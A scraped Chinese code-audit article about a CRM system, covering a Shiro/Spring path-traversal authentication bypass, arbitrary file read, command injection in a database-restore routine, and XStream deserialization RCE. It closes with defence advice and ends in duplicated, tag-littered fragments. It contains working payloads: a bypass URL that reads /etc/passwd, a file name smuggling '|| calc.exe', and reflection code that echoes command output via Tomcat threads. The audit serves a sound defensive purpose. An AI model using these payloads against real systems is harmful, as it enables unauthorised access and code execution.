某CRM系统代码审计与漏洞利用分析<\/h1>

1. 权限绕过漏洞分析<\/h2>

1.1 漏洞背景<\/h3>
该系统使用Apache Shiro进行权限验证，配合Spring框架存在认证绕过漏洞。<\/p>

1.2 漏洞原理<\/h3>
Shiro通过PathMatchingFilterChainResolver#getChain<\/code>方法匹配路由和过滤器：<\/p>
public<\/span> FilterChain getChain<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain originalChain)<\/span> {<\/span>
<\/span><\/span>    FilterChainManager filterChainManager =<\/span> this<\/span>.<\/span>getFilterChainManager<\/span>();<\/span>
<\/span><\/span>    if<\/span> (!<\/span>filterChainManager.<\/span>hasChains<\/span>())<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        String requestURI =<\/span> this<\/span>.<\/span>getPathWithinApplication<\/span>(<\/span>request);<\/span>
<\/span><\/span>        \/\/ ...处理URI...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键处理流程：<\/p>


Shiro的getRequestUri<\/code>方法处理URL：<\/p>

decodeAndCleanUriString<\/code>: 保留分号(;)前的路径<\/li>
normalize<\/code>: 标准化路径（处理..<\/code>、.<\/code>等）<\/li>
<\/ul>
<\/li>

Spring的UrlPathHelper<\/code>处理URL：<\/p>

removeSemicolonContent<\/code>: 移除分号内容<\/li>
最终处理为实际路径<\/li>
<\/ul>
<\/li>
<\/ol>
1.3 漏洞利用<\/h3>
配置示例：<\/p>
map.<\/span>put<\/span>(<\/span>"\/home\/**"<\/span>,<\/span>"anon"<\/span>);<\/span>  \/\/ 无需认证
<\/span><\/span><\/span><\/span>map.<\/span>put<\/span>(<\/span>"\/admin\/*"<\/span>,<\/span>"authc"<\/span>);<\/span> \/\/ 需要认证
<\/span><\/span><\/span><\/code><\/pre>构造恶意URL：<\/p>
\/home\/..;\/admin\/xxx
<\/code><\/pre>
处理流程：<\/p>

Shiro获取URI为\/home\/..<\/code>，匹配\/home\/**<\/code>规则放行<\/li>
Spring处理为\/home\/..\/admin\/xxx<\/code> → 实际访问\/admin\/xxx<\/code><\/li>
<\/ol>
2. 任意文件读取漏洞<\/h2>
2.1 漏洞位置<\/h3>
在xxxLogController<\/code>类的download<\/code>方法：<\/p>
public<\/span> void<\/span> download<\/span>(<\/span>String path,<\/span> HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> {<\/span>
<\/span><\/span>    File file =<\/span> new<\/span> File(<\/span>path);<\/span>
<\/span><\/span>    InputStream fis =<\/span> new<\/span> BufferedInputStream(<\/span>new<\/span> FileInputStream(<\/span>path));<\/span>
<\/span><\/span>    \/\/ ...读取文件内容并返回...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 漏洞复现<\/h3>

直接访问受保护端点会被重定向到登录页<\/li>
使用权限绕过技术访问：
\/home\/..;\/download?path=\/etc\/passwd
<\/code><\/pre>
<\/li>
<\/ol>
3. 命令执行漏洞<\/h2>
3.1 漏洞位置<\/h3>
在exeCommand<\/code>方法：<\/p>
private<\/span> void<\/span> exeCommand<\/span>(<\/span>String command)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>    Process exec =<\/span> runtime.<\/span>exec<\/span>(<\/span>command);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>被doRestore<\/code>方法调用：<\/p>
public<\/span> void<\/span> doRestore<\/span>(<\/span>String fileName)<\/span> {<\/span>
<\/span><\/span>    String sbCommand =<\/span> "cmd \/c "<\/span> +<\/span> mysqlPath +<\/span> "mysql -u"<\/span> +<\/span> username 
<\/span><\/span>        +<\/span> " -p"<\/span> +<\/span> password +<\/span> " -h"<\/span> +<\/span> host +<\/span> " -P"<\/span> +<\/span> port 
<\/span><\/span>        +<\/span> " -B "<\/span> +<\/span> database +<\/span> " < "<\/span> +<\/span> exportPath +<\/span> fileName;<\/span>
<\/span><\/span>    this<\/span>.<\/span>exeCommand<\/span>(<\/span>sbCommand.<\/span>toString<\/span>());<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 漏洞利用<\/h3>
通过||<\/code>操作符注入命令：<\/p>
fileName = "test.sql || calc.exe"
<\/code><\/pre>
最终执行：<\/p>
cmd \/c mysqlPath\/mysql -u UserName -p Password -h host -P xx -B xx < test.sql || calc.exe
<\/code><\/pre>
3.3 调用链<\/h3>
Controller层方法：<\/p>
@RequestMapping<\/span>(<\/span>"\/restore"<\/span>)<\/span>
<\/span><\/span>public<\/span> String doRestore<\/span>(<\/span>@RequestParam<\/span> String fileName)<\/span> {<\/span>
<\/span><\/span>    this<\/span>.<\/span>backupService<\/span>.<\/span>doRestore<\/span>(<\/span>fileName);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. XStream反序列化漏洞<\/h2>
4.1 漏洞位置<\/h3>
在WechatxxxService<\/code>类中使用fromXML<\/code>处理请求体：<\/p>
XStream.<\/span>fromXML<\/span>(<\/span>requestBody);<\/span>
<\/span><\/span><\/code><\/pre>4.2 漏洞复现<\/h3>
使用XStream反序列化POC，利用TemplatesImpl<\/code>类实现RCE。<\/p>
4.3 回显技术<\/h3>
通过线程获取Request和Response对象：<\/p>


获取线程：<\/p>
Thread[]<\/span> threads =<\/span> (<\/span>Thread[])<\/span> Thread.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"getThreads"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

查找Tomcat工作线程：<\/p>

http-nio-8080-Acceptor<\/code><\/li>
http-nio-8080-Poller<\/code><\/li>
<\/ul>
<\/li>

反射获取Request和Response：<\/p>
\/\/ 从Acceptor线程获取NioEndpoint
<\/span><\/span><\/span><\/span>Field endpointField =<\/span> acceptorTarget.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"endpoint"<\/span>);<\/span>
<\/span><\/span>Object endpoint =<\/span> endpointField.<\/span>get<\/span>(<\/span>acceptorTarget);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取ConnectionHandler
<\/span><\/span><\/span><\/span>Field handlerField =<\/span> endpoint.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"handler"<\/span>);<\/span>
<\/span><\/span>Object handler =<\/span> handlerField.<\/span>get<\/span>(<\/span>endpoint);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取RequestGroupInfo
<\/span><\/span><\/span><\/span>Field globalField =<\/span> handler.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"global"<\/span>);<\/span>
<\/span><\/span>Object global =<\/span> globalField.<\/span>get<\/span>(<\/span>handler);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取Processor列表
<\/span><\/span><\/span><\/span>Field processorsField =<\/span> global.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"processors"<\/span>);<\/span>
<\/span><\/span>ArrayList processors =<\/span> (<\/span>ArrayList)<\/span> processorsField.<\/span>get<\/span>(<\/span>global);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取Request和Response
<\/span><\/span><\/span><\/span>Field reqField =<\/span> processor.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"req"<\/span>);<\/span>
<\/span><\/span>Object request =<\/span> reqField.<\/span>get<\/span>(<\/span>processor);<\/span>
<\/span><\/span>
<\/span><\/span>Object catalinaRequest =<\/span> request.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getNote"<\/span>,<\/span> int<\/span>.<\/span>class<\/span>).<\/span>invoke<\/span>(<\/span>request,<\/span> 1<\/span>);<\/span>
<\/span><\/span>Object response =<\/span> catalinaRequest.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getResponse"<\/span>).<\/span>invoke<\/span>(<\/span>catalinaRequest);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

写回响应：<\/p>
Writer writer =<\/span> (<\/span>Writer)<\/span> response.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getWriter"<\/span>).<\/span>invoke<\/span>(<\/span>response);<\/span>
<\/span><\/span>writer.<\/span>write<\/span>(<\/span>commandResult);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 防御建议<\/h2>


Shiro权限绕过<\/strong>：<\/p>

升级Shiro到最新版本<\/li>
实现自定义的PathMatchingFilterChainResolver<\/code><\/li>
<\/ul>
<\/li>

任意文件读取<\/strong>：<\/p>

校验文件路径<\/li>
使用白名单限制可访问目录<\/li>
<\/ul>
<\/li>

命令执行<\/strong>：<\/p>

避免直接拼接命令<\/li>
使用参数化查询<\/li>
<\/ul>
<\/li>

反序列化<\/strong>：<\/p>

升级XStream版本<\/li>
配置安全框架限制反序列化类<\/li>
使用JSON替代XML<\/li>
<\/ul>
<\/li>

通用防御<\/strong>：<\/p>

实施严格的输入验证<\/li>
遵循最小权限原则<\/li>
定期安全审计和代码审查<\/li>
<\/ul>
<\/li>
<\/ol>
某CRM系统代码审计与漏洞利用分析<\/h1>

1. 权限绕过漏洞分析<\/h2>

1.1 漏洞背景<\/h3> 该系统使用Apache Shiro进行权限验证，配合Spring框架存在认证绕过漏洞。<\/p>

2. 任意文件读取漏洞<\/h2>

3. 命令执行漏洞<\/h2>

4. XStream反序列化漏洞<\/h2>

4.2 漏洞复现<\/h3> 使用XStream反序列化POC，利用TemplatesImpl<\/code>类实现RCE。<\/p>

1.1 漏洞背景<\/h3>
该系统使用Apache Shiro进行权限验证，配合Spring框架存在认证绕过漏洞。<\/p>

4.2 漏洞复现<\/h3>
使用XStream反序列化POC，利用`TemplatesImpl<\/code>类实现RCE。<\/p>`
